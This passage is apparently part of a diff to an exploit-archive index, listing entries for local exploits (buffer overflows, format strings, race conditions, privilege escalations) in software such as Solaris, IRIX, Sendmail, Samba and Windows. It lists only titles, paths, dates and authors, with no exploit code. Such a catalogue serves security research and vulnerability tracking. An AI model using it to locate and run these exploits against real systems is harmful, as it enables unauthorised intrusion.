T. Shebs Xconq 7.2.2 - xconq Buffer Overflow",2000-06-22,V9,local,linux, +20107,exploits/unix/local/20107.txt,"CVS Kit CVS Server 1.10.8 - Instructed File Create",2000-07-28,"Tanaka Akira",local,unix, +20108,exploits/unix/local/20108.txt,"CVS Kit CVS Server 1.10.8 - 'Checkin.prog' Binary Execution",2000-06-28,"Tanaka Akira",local,unix, +20116,exploits/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Local Buffer Overflow (ASLR + DEP Bypass)",2012-07-27,"Ptrace Security",local,windows, +20126,exploits/irix/local/20126.c,"IRIX 6.5.x - '/usr/sbin/gr_osview' Local Buffer Overflow",1997-01-01,"Last Stage of Delirium",local,irix, +20127,exploits/irix/local/20127.c,"SGI IRIX 6.2 - 'libgl.so' Local Buffer Overflow",1997-09-01,"Last Stage of Delirium",local,irix, +20128,exploits/irix/local/20128.c,"IRIX 6.5.x - '/usr/sbin/dmplay' Local Buffer Overflow",2000-08-02,"Last Stage of Delirium",local,irix, +20129,exploits/irix/local/20129.c,"IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow",1998-11-01,"Last Stage of Delirium",local,irix, +20130,exploits/irix/local/20130.c,"IRIX 6.5.x - '/usr/lib/InPerson/inpview' Race Condition",2000-01-01,"Last Stage of Delirium",local,irix, +20133,exploits/windows/local/20133.cpp,"Microsoft Windows Server 2000 - Named Pipes Predictability",2000-08-01,Maceo,local,windows, +20137,exploits/irix/local/20137.c,"IRIX 6.2/6.3/6.4 - xfs truncate() Privilege Check",1997-02-01,"Last Stage of Delirium",local,irix, +20138,exploits/irix/local/20138.c,"IRIX 5.3/6.x - '/usr/bin/mail' Local Buffer Overflow",1997-09-01,"Last Stage of Delirium",local,irix, +20141,exploits/linux/local/20141.pl,"SUIDPerl 5.00503 - Mail Shell Escape (1)",2000-08-07,"Sebastian Krahmer",local,linux, +20142,exploits/linux/local/20142.sh,"SUIDPerl 5.00503 - Mail Shell Escape (2)",2000-08-07,"Michal Zalewski",local,linux, +20147,exploits/solaris/local/20147.sh,"Tech-Source Raptor GFX PGX32 2.3.1 - Config Tool",2000-08-02,suid,local,solaris, +20153,exploits/unix/local/20153.c,"David Bagley xlock 4.16 - User Supplied Format String (1)",2000-08-15,noir,local,unix, +20154,exploits/unix/local/20154.c,"David Bagley xlock 4.16 - User Supplied Format String (2)",2000-10-21,"Ben Williams",local,unix, +20155,exploits/linux/local/20155.txt,"Multisoft FlagShip 4.4 - Installation Permission",2000-08-10,Narrow,local,linux, +20160,exploits/linux/local/20160.txt,"Minicom 1.82/1.83 - Capture-file Group Ownership",2000-08-19,"Michal Zalewski",local,linux, +20162,exploits/hp-ux/local/20162.txt,"HP-UX 11.0 - net.init RC Script",2000-08-22,"Kyong-won Cho",local,hp-ux, +20179,exploits/unix/local/20179.txt,"Gert Doering mgetty 1.1.19/1.1.20/1.1.21/1.22.8 - Symbolic Link Traversal",2000-08-25,"Stan Bubrouski",local,unix, +20185,exploits/linux/local/20185.c,"RedHat 6 GLIBC/locale - Subsystem Format String",2000-09-06,warning3,local,linux, +20186,exploits/solaris/local/20186.c,"Solaris 2.6/7.0 /locale - Subsystem Format String",2000-11-02,warning3,local,solaris, +20187,exploits/immunix/local/20187.c,"Immunix OS 6.2 - LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",local,immunix, +20188,exploits/solaris/local/20188.c,"Solaris 2.6/7.0 'eject' locale - Subsystem Format String",2000-09-08,warning3,local,solaris, +20189,exploits/unix/local/20189.c,"Libc locale - Local Privilege Escalation (1)",2000-09-04,Synnergy.net,local,unix, +20190,exploits/unix/local/20190.c,"Libc locale - Local Privilege Escalation (2)",2000-09-04,anonymous,local,unix, +20191,exploits/bsd/local/20191.c,"Juergen Weigert screen 3.9 - User Supplied Format String",2000-09-05,IhaQueR@IRCnet,local,bsd, +20193,exploits/unix/local/20193.txt,"LPPlus 3.2.2/3.3 - dccscan Unprivileged read",2000-09-06,"Dixie Flatline",local,unix, +20201,exploits/linux/local/20201.c,"Nvidia Linux Driver - Local Privilege Escalation",2012-08-02,anonymous,local,linux, +20209,exploits/windows/local/20209.cpp,"Microsoft Windows Server 2000 - Still Image Service Privilege Escalation",2000-09-06,dildog,local,windows, +20212,exploits/unix/local/20212.txt,"GNOME esound 0.2.19 - Unix Domain Socket Race Condition",2000-08-31,"Kris Kennaway",local,unix, +20213,exploits/aix/local/20213.txt,"AIX 4.2/4.3 - netstat -Z Statistic Clearing",2000-09-03,"alex medvedev",local,aix, +20542,exploits/windows/local/20542.rb,"GlobalScape CuteZIP - Local Stack Buffer Overflow (Metasploit)",2012-08-15,Metasploit,local,windows, +20230,exploits/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Local Privilege Escalation",2000-06-24,"Stephen J. Friedl",local,sco, +20232,exploits/windows/local/20232.cpp,"Microsoft Windows NT 4.0/2000 - DLL Search Path",2000-09-18,"Georgi Guninski",local,windows, +20241,exploits/palm_os/local/20241.txt,"Palm OS 3.5.2 - Weak Encryption",2000-09-26,@stake,local,palm_os, +20250,exploits/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,local,linux, +20251,exploits/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",local,linux, +20252,exploits/linux/local/20252.c,"LBL Traceroute 1.4 a5 - Heap Corruption (3)",2000-09-28,"Michel Kaempf",local,linux, +20256,exploits/openbsd/local/20256.c,"OpenBSD 2.x - 'fstat' Format String",2000-10-04,K2,local,openbsd, +20257,exploits/windows/local/20257.txt,"Microsoft Windows NT 4.0/2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",local,windows, +20543,exploits/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation (Metasploit)",2012-08-15,Metasploit,local,windows, +20262,exploits/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass) (2)",2012-08-05,pole,local,windows, +20263,exploits/irix/local/20263.txt,"IRIX 5.2/6.0 - Permissions File Manipulation",1995-03-02,"Larry Glaze",local,irix, +20265,exploits/windows/local/20265.txt,"Microsoft Windows NT 4.0/2000 - Spoofed LPC Request (MS00-003)",2000-10-03,"BindView's Razor Team",local,windows, +20274,exploits/multiple/local/20274.pl,"IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",local,multiple, +20275,exploits/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions",2000-10-10,@stake,local,solaris, +20276,exploits/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart' Local Privilege Escalation",2000-10-10,@stake,local,solaris, +20285,exploits/linux/local/20285.c,"RedHat 6.2/7.0 Tmpwatch - Arbitrary Command Execution",2000-10-06,X-Force,local,linux, +20290,exploits/aix/local/20290.txt,"AIX 3.x - bugfiler Arbitrary File Creation",1997-09-08,"Johannes Schwabe",local,aix, +20291,exploits/linux/local/20291.sh,"Elm 2.4 - 'filter' Arbitrary Mail Disclosure",1995-12-26,"David J Meltzer",local,linux, +20294,exploits/unix/local/20294.txt,"XFree86 3.3.5/3.3.6 - Xlib Display Buffer Overflow",2000-10-12,"Michal Zalewski",local,unix, +20296,exploits/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass)",2012-08-06,"Robert Larsen",local,windows, +40428,exploits/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,local,windows, +20312,exploits/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap",2000-10-18,"Juan Manuel Pascual Escribá",local,linux, +20316,exploits/linux/local/20316.txt,"BSD 'lpr' 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",local,linux, +20317,exploits/windows/local/20317.c,"Microsoft Windows NT 4.0 - MSIEXEC Registry Permissions",2000-10-23,Mnemonix,local,windows, +20326,exploits/unix/local/20326.sh,"ntop 1.x - i Local Format String",2000-10-18,"Paul Starzetz",local,unix, +20329,exploits/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 - crontab '/tmp' File",2000-10-20,"Kyong-won Cho",local,hp-ux, +20333,exploits/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Local Overflow",1997-07-21,"D. J. Bernstein",local,unix, +20338,exploits/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,local,linux, +20339,exploits/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,local,linux, +20341,exploits/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,local,linux, +20377,exploits/freebsd/local/20377.c,"FreeBSD 3.5/4.x - '/usr/bin/top' Format String",2000-11-01,truefinder,local,freebsd, +20378,exploits/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",local,linux, +20380,exploits/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,local,unix, +20381,exploits/unix/local/20381.c,"ManTrap 1.6.1 - Root Directory Inode Disclosure",2000-11-01,f8labs,local,unix, +20382,exploits/unix/local/20382.pl,"Debian 2.x / RedHat 6.2 / IRIX 5/6 / Solaris 2.x - Mail Reply-To Field",2000-11-01,"Gregory Duchemin",local,unix, +20383,exploits/windows/local/20383.txt,"Microsoft IIS 4.0 - ISAPI Buffer Overflow",2000-11-06,"Marc Maiffret",local,windows, +20385,exploits/linux/local/20385.sh,"RedHat 0.4 b15 restore - Insecure Environment Variables",2000-11-04,fish,local,linux, +20386,exploits/hp-ux/local/20386.txt,"HP-UX 10.20 - registrar Local Arbitrary File Read",2000-11-08,"J.A. Gutierrez",local,hp-ux, +20396,exploits/hp-ux/local/20396.sh,"HP-UX 10.x/11.x - Aserver PATH",1998-10-18,Loneguard,local,hp-ux, +40427,exploits/windows/local/40427.txt,"Iperius Remote 1.7.0 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,local,windows, +20401,exploits/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent",2000-11-10,"Hugo Caye",local,windows, +20402,exploits/linux/local/20402.sh,"Linux modutils 2.3.9 - 'modprobe' Arbitrary Command Execution",2000-11-12,"Michal Zalewski",local,linux, +20407,exploits/windows/local/20407.c,"NetcPlus SmartServer3 3.75 - Weak Encryption",2000-11-18,"Steven Alexander",local,windows, +20409,exploits/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption",2000-11-18,"Steven Alexander",local,windows, +20410,exploits/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 - 'Svgalib' Local Buffer Overflow",2000-11-20,Synnergy.net,local,unix, +20411,exploits/linux/local/20411.c,"Oracle 8.x - cmctl Buffer Overflow",2000-11-20,anonymous,local,linux, +41031,exploits/windows/local/41031.txt,"aSc Timetables 2017 - Local Buffer Overflow",2017-01-12,"Peter Baris",local,windows, +20417,exploits/osx/local/20417.c,"Tunnelblick - Local Privilege Escalation (1)",2012-08-11,zx2c4,local,osx, +20418,exploits/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Privilege Escalation",2012-08-11,"Larry Cashdollar",local,solaris, +20436,exploits/unix/local/20436.sh,"Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell Redirection Race Condition",2000-01-02,proton,local,unix, +20443,exploits/osx/local/20443.sh,"Tunnelblick - Local Privilege Escalation (2)",2012-08-11,zx2c4,local,osx, +20451,exploits/windows/local/20451.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_displayparamstmt Buffer Overflow",2000-12-01,"David Litchfield",local,windows, +20452,exploits/aix/local/20452.c,"IBM AIX 4.x - '/usr/bin/setsenv' Local Buffer Overflow",2000-12-01,"Last Stage of Delirium",local,aix, +20453,exploits/aix/local/20453.c,"IBM AIX 4.3 - '/usr/lib/lpd/digest' Local Buffer Overflow",2000-12-01,"Last Stage of Delirium",local,aix, +20454,exploits/aix/local/20454.sh,"IBM AIX 4.x - 'enq' Local Buffer Overflow",2003-04-24,watercloud,local,aix, +20455,exploits/aix/local/20455.c,"IBM AIX 4.3.x - '/usr/lib/lpd/piobe' Local Buffer Overflow",2000-12-01,"Last Stage of Delirium",local,aix, +20456,exploits/windows/local/20456.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_showcolv Buffer Overflow",2000-12-01,"David Litchfield",local,windows, +20457,exploits/windows/local/20457.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_peekqueue Buffer Overflow",2000-12-01,@stake,local,windows, +20458,exploits/linux/local/20458.txt,"Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak",2000-11-30,"Lamagra Argamal",local,linux, +20485,exploits/osx/local/20485.sh,"Viscosity - Local Privilege Escalation",2012-08-13,zx2c4,local,osx, +20493,exploits/linux/local/20493.sh,"University of Washington Pico 3.x/4.x - File Overwrite",2000-12-11,mat,local,linux, +20505,exploits/palm_os/local/20505.txt,"Secure Computing e.iD Authenticator for Palm 2.0 - PIN Brute Force",2000-12-14,@stake,local,palm_os, +20514,exploits/solaris/local/20514.pl,"Solaris 2.5.1/2.6/7.0/8 - patchadd Race Condition",2000-12-18,"Larry W. Cashdollar",local,solaris, +20517,exploits/linux/local/20517.c,"Itetris 1.6.1/1.6.2 - Privileged Arbitrary Command Execution",2000-12-19,V9,local,linux, +20520,exploits/solaris/local/20520.pl,"Solaris 2.x/7.0/8 - 'Catman' Race Condition (1)",2000-11-21,"Vapid Labs",local,solaris, +20521,exploits/solaris/local/20521.pl,"Solaris 2.x/7.0/8 - 'Catman' Race Condition (2)",2000-11-21,"Vapid Labs",local,solaris, +20526,exploits/unix/local/20526.c,"GTK+ 1.2.8 - Arbitrary Loadable Module Execution",2001-01-02,V9,local,unix, +20554,exploits/linux/local/20554.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (1)",2001-01-13,IhaQueR,local,linux, +20555,exploits/linux/local/20555.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (2)",2001-01-13,IhaQueR,local,linux, +20556,exploits/linux/local/20556.c,"Debian 2.2 - splitvt Format String",2001-01-16,"Michel Kaempf",local,linux, +20560,exploits/unix/local/20560.c,"SSH 1.2.x - Secure-RPC Weak Encrypted Authentication",2001-01-16,"Richard Silverman",local,unix, +20581,exploits/linux/local/20581.c,"Mysql 3.22.x/3.23.x - Local Buffer Overflow",2001-01-18,"Luis Miguel Silva",local,linux, +20585,exploits/windows/local/20585.txt,"LocalWEB2000 1.1 - Directory Traversal",2001-01-22,"SNS Research",local,windows, +20603,exploits/solaris/local/20603.c,"Solaris 7/8 - ximp40 Library Buffer Overflow",2001-01-31,UNYUN,local,solaris, +20604,exploits/linux/local/20604.sh,"Debian 2.2 / Su.S.E 6.3/6.4/7.0 - man '-l' Format String",2001-01-31,IhaQueR,local,linux, +20621,exploits/unix/local/20621.txt,"Micro Focus Cobol 4.1 - Arbitrary Command Execution",2001-02-12,"Dixie Flatline",local,unix, +20626,exploits/linux/local/20626.c,"Linux Kernel 2.2.x - 'sysctl()' Memory Reading (PoC)",2001-02-09,"Chris Evans",local,linux, +20645,exploits/linux/local/20645.c,"Elm 2.5.3 - Alternative-Folder Buffer Overflow",2001-02-13,_kiss_,local,linux, +20651,exploits/windows/local/20651.txt,"datawizards ftpxq 2.0.93 - Directory Traversal",2001-02-28,joetesta,local,windows, +20658,exploits/unix/local/20658.txt,"Joe Text Editor 2.8 - '.joerc' Arbitrary Command Execution",2001-02-28,"Wkit Security",local,unix, +20678,exploits/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Local Buffer Overflow (1)",2001-03-08,anonymous,local,unix, +20679,exploits/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Local Buffer Overflow (2)",2001-03-08,"the itch",local,unix, +40426,exploits/windows/local/40426.txt,"MSI - 'NTIOLib.sys' / 'WinIO.sys' Local Privilege Escalation",2016-09-26,ReWolf,local,windows, +20684,exploits/solaris/local/20684.c,"Solaris 2.5/2.6/7.0/8 tip - Local Buffer Overflow",2001-03-27,"Pablo Sor",local,solaris, +20691,exploits/linux/local/20691.txt,"FTPFS 0.1.1/0.2.1/0.2.2 - mount Buffer Overflow",2001-03-13,"Frank DENIS",local,linux, +20697,exploits/unix/local/20697.c,"DG/UX 4.20 lpsched - 'Error Message' Local Buffer Overflow",2001-03-19,"Luciano Rocha",local,unix, +20715,exploits/solaris/local/20715.txt,"Junsoft JSparm 4.0 - Logging Output File",2001-03-23,KimYongJun,local,solaris, +20718,exploits/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 - Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,local,unix, +20720,exploits/linux/local/20720.c,"Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1)",2001-03-27,"Wojciech Purczynski",local,linux, +20721,exploits/linux/local/20721.c,"Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2)",2001-03-27,"Wojciech Purczynski",local,linux, +40425,exploits/windows/local/40425.txt,"Elantech-Smart Pad 11.9.0.0 - Unquoted Service Path Privilege Escalation",2016-09-26,zaeek,local,windows, +20724,exploits/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 Beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",local,hp-ux, +20740,exploits/solaris/local/20740.c,"Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (1)",2001-04-09,"Riley Hassell",local,solaris, +20741,exploits/solaris/local/20741.c,"Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (2)",2001-04-09,"Adam Slattery",local,solaris, +20743,exploits/solaris/local/20743.c,"Solaris 2.x/7.0/8 - Xsun HOME Buffer Overflow",2001-04-10,"Riley Hassell",local,solaris, +20746,exploits/palm_os/local/20746.c,"Strip Password Generator 0.3/0.4/0.5 - Limited Password-Space",2001-04-10,"Thomas Roessler",local,palm_os, +20751,exploits/solaris/local/20751.txt,"Solaris 7.0/8 - IPCS Timezone Buffer Overflow",2001-04-12,"Riley Hassell",local,solaris, +20766,exploits/unix/local/20766.c,"SGI IRIX 6.5 / Solaris 7.0/8 CDE - '/usr/dt/bin/dtsession' Local Buffer Overflow",2001-04-11,"Last Stage of Delirium",local,unix, +20767,exploits/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)",1999-12-01,"Last Stage of Delirium",local,solaris, +20768,exploits/solaris/local/20768.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (2)",1999-12-01,"Last Stage of Delirium",local,solaris, +20769,exploits/unix/local/20769.txt,"Siemens Reliant UNIX 5.4 - ppd -T Race Condition",2001-04-14,"Ruiz Garcia",local,unix, +20772,exploits/solaris/local/20772.c,"Solaris 2.5/2.6/7.0/8 - 'mailx -F' Local Buffer Overflow (1)",2001-04-01,"Pablo Sor",local,solaris, +20773,exploits/solaris/local/20773.c,"Solaris 2.5/2.6/7.0/8 - 'mailx -F' Local Buffer Overflow (2)",2001-04-15,"Pablo Sor",local,solaris, +20776,exploits/linux/local/20776.c,"Samba 2.0.x - Insecure TMP File Symbolic Link",2001-04-17,"Gabriel Maggiotti",local,linux, +20777,exploits/linux/local/20777.c,"ISC INN 2.x - Command-Line Buffer Overflow (1)",2001-04-18,"Enrique A.",local,linux, +20778,exploits/linux/local/20778.sh,"ISC INN 2.x - Command-Line Buffer Overflow (2)",2001-04-18,"Enrique A.",local,linux, +20781,exploits/linux/local/20781.txt,"SuSE 7.0 - KFM Insecure '.TMP' File Creation",2001-04-18,"Paul Starzetz",local,linux, +20795,exploits/linux/local/20795.sh,"Sendfile 1.x/2.1 - Local Privileged Arbitrary Command Execution",2001-04-24,psheep,local,linux, +20798,exploits/linux/local/20798.sh,"Sendfile 1.x/2.1 - Forced Privilege Lowering Failure",2001-04-24,"Cade Cairns",local,linux, +20804,exploits/irix/local/20804.c,"IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage",2001-04-26,V9,local,irix, +40422,exploits/windows/local/40422.txt,"NetDrive 2.6.12 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,local,windows, +20822,exploits/linux/local/20822.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (1)",2001-05-07,"Sebastian Krahmer",local,linux, +20823,exploits/linux/local/20823.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (2)",2001-07-05,cairnsc,local,linux, +20843,exploits/linux/local/20843.txt,"Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / SuSE Linux 6.x/7.0/7.1 - 'Man -S' Heap Overflow",2001-05-13,"zenith parsec",local,linux, +20851,exploits/sco/local/20851.txt,"SCO OpenServer 5.0.x - StartX Weak XHost Permissions",2001-05-07,"Richard Johnson",local,sco, +20861,exploits/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)",2012-08-27,"Shahriyar Jalayeri",local,win_x86-64, +20867,exploits/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",local,linux, +20868,exploits/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client - inetd.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",local,linux, +20880,exploits/windows/local/20880.c,"Microsoft Windows Server 2000 - Debug Registers",2001-05-24,"Georgi Guninski",local,windows, +20885,exploits/solaris/local/20885.c,"Solaris 8 mailtool - Local Buffer Overflow",2001-06-01,51,local,solaris, +20897,exploits/linux/local/20897.sh,"Debian 2.1/2.2 - Man Cache File Creation",2001-06-01,jenggo,local,linux, +20898,exploits/linux/local/20898.sh,"RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation",2001-05-18,jenggo,local,linux, +20900,exploits/linux/local/20900.txt,"Exim 3.x - Format String",2001-06-06,"Megyer Laszlo",local,linux, +20901,exploits/linux/local/20901.c,"Sudo 1.5/1.6 - Heap Corruption",2001-02-22,MaXX,local,linux, +20905,exploits/unix/local/20905.txt,"Thibault Godouet FCron 1 - Symbolic Link",2001-06-07,"Uwe Ohse",local,unix, +20906,exploits/unix/local/20906.c,"kosch suid wrapper 1.1.1 - Local Buffer Overflow",2001-06-07,dex,local,unix, +20915,exploits/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation",2012-08-29,"Craig Freyman",local,windows, +20923,exploits/unix/local/20923.c,"LPRng 3.6.x - Failure To Drop Supplementary Groups",2001-06-07,zen-parse,local,unix, +20926,exploits/linux/local/20926.txt,"Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow",2001-06-12,zen-parse,local,linux, +20927,exploits/linux/local/20927.c,"BestCrypt 0.6/0.7/0.8 - BCTool UMount Buffer Overflow",2001-06-14,"Carl Livitt",local,linux, +20928,exploits/linux/local/20928.sh,"Rxvt 2.6.1/2.6.2 - Local Buffer Overflow",2001-06-15,MasterSecuritY,local,linux, +20937,exploits/irix/local/20937.c,"SGI Performance Co-Pilot 2.1.x/2.2 - pmpost Symbolic Link",2001-06-18,IhaQueR,local,irix, +20945,exploits/solaris/local/20945.txt,"Sun SunVTS 4.x - PTExec Buffer Overflow",2001-06-21,"Pablo Sor",local,solaris, +20960,exploits/unix/local/20960.c,"Juergen Schoenwaelder scotty 2.1.x - ntping Buffer Overflow",2001-06-13,"Larry W. Cashdollar",local,unix, +20961,exploits/unix/local/20961.sh,"KDE KTVision 0.1 - File Overwrite",2001-06-21,IhaQueR,local,unix, +20962,exploits/unix/local/20962.pl,"cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (1)",2001-06-21,teleh0r,local,unix, +20963,exploits/unix/local/20963.c,"cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (2)",2001-07-11,"Megyer Laszlo",local,unix, +20964,exploits/unix/local/20964.c,"cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (3)",2001-07-10,qitest1,local,unix, +20965,exploits/aix/local/20965.sh,"AIX 4.3/5.1 - diagrpt Arbitrary Privileged Program Execution",2003-05-23,watercloud,local,aix, +20967,exploits/linux/local/20967.c,"Vim 5.x - Swap File Race Condition",2001-01-26,zen-parse,local,linux, +20969,exploits/solaris/local/20969.c,"Solaris 8 libsldap - Local Buffer Overflow (1)",2001-06-26,noir,local,solaris, +20970,exploits/solaris/local/20970.c,"Solaris 8 libsldap - Local Buffer Overflow (2)",2001-06-27,Fyodor,local,solaris, +20974,exploits/solaris/local/20974.c,"Solaris 2.6/2.6/7.0/8 whodo - Local Buffer Overflow",2001-06-01,"Pablo Sor",local,solaris, +20979,exploits/linux/local/20979.c,"Linux Kernel 2.2/2.4 - procfs Stream redirection to Process Memory Privilege Escalation",2001-06-27,zen-parse,local,linux, +20985,exploits/php/local/20985.php,"PHP 4.x - SafeMode Arbitrary File Execution",2001-06-30,"Wojciech Purczynski",local,php, +20986,exploits/linux/local/20986.c,"Xvt 2.1 - Local Buffer Overflow",2001-07-02,"Christophe Bailleux",local,linux, +20988,exploits/linux/local/20988.c,"CylantSecure 1.0 - Kernel Module Syscall Rerouting",2001-06-29,"Juergen Pabel",local,linux, +20990,exploits/linux/local/20990.c,"teTeX 1.0.7 - Filters Temporary File Race Condition",2001-06-22,zen-parse,local,linux, +20992,exploits/linux/local/20992.c,"Lmail 2.7 - Temporary File Race Condition",2001-07-04,"Charles Stevenson",local,linux, +20999,exploits/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (1)",2001-07-10,"Charles Stevenson",local,hardware, +21000,exploits/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (2)",2001-07-10,ml85p,local,hardware, +21001,exploits/hardware/local/21001.txt,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (3)",2001-07-10,ml85p,local,hardware, +21010,exploits/linux/local/21010.sh,"XFree86 X11R6 3.3.2 XMan - ManPath Environment Variable Buffer Overflow",2001-06-11,kf,local,linux, +21014,exploits/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation",2001-07-17,josh,local,linux, +21020,exploits/multiple/local/21020.c,"NetWin DMail 2.x / SurgeFTP 1.0/2.0 - Weak Password Encryption",2001-07-20,byterage,local,multiple, +21024,exploits/solaris/local/21024.c,"Solaris 2.6/7.0 - DTMail Mail Environment Variable Buffer Overflow",2001-07-24,"NSFOCUS Security Team",local,solaris, +21043,exploits/linux/local/21043.c,"GNU findutils 4.0/4.1 - Locate Arbitrary Command Execution",2001-08-01,"Josh Smith",local,linux, +21044,exploits/windows/local/21044.c,"Oracle 8/9i - DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",local,windows, +21045,exploits/unix/local/21045.c,"Oracle OTRCREP Oracle 8/9 - Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",local,unix, +21058,exploits/solaris/local/21058.c,"Solaris 2.6/7/8 (SPARC) - xlock Heap Overflow",2001-08-10,Nsfocus,local,solaris, +21059,exploits/solaris/local/21059.c,"Solaris 8 - x86 xlock Heap Overflow",2001-08-10,Nsfocus,local,solaris, +21060,exploits/linux/local/21060.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (1)",2001-08-17,grange,local,linux, +21061,exploits/linux/local/21061.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (2)",2001-08-17,sd@sf.cz,local,linux, +21062,exploits/linux/local/21062.txt,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (3)",2001-08-17,"Lucian Hudin",local,linux, +21063,exploits/linux/local/21063.txt,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (4)",2001-08-17,"RoMaN SoFt",local,linux, +21069,exploits/windows/local/21069.c,"Microsoft Windows Server 2000 - RunAs Service Named Pipe Hijacking",2001-12-11,Camisade,local,windows, +21070,exploits/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 - Insecure Password",2001-08-15,"Macintosh Security",local,osx, +21071,exploits/windows/local/21071.c,"Microsoft IIS 4.0/5.0 - SSI Buffer Overrun Privilege Escalation",2001-08-15,Indigo,local,windows, +21072,exploits/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Escalation",2001-08-15,"Digital Offense",local,windows, +21073,exploits/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 - Error Message Information Disclosure",2001-08-16,LoWNOISE,local,unix, +21076,exploits/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 - Weak Password Encryption",2001-08-20,MacSec,local,osx, +21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple, +21256,exploits/windows/local/21256.rb,"Winamp - MAKI Buffer Overflow (Metasploit)",2012-09-12,Metasploit,local,windows, +21090,exploits/windows/local/21090.txt,"CuteFTP 4.2 - Default Weak Password Encoding",2001-08-23,"E. van Elk",local,windows, +21091,exploits/windows/local/21091.txt,"UltraEdit 8.2 - FTP Client Weak Password Encryption",2001-08-23,"E. van Elk",local,windows, 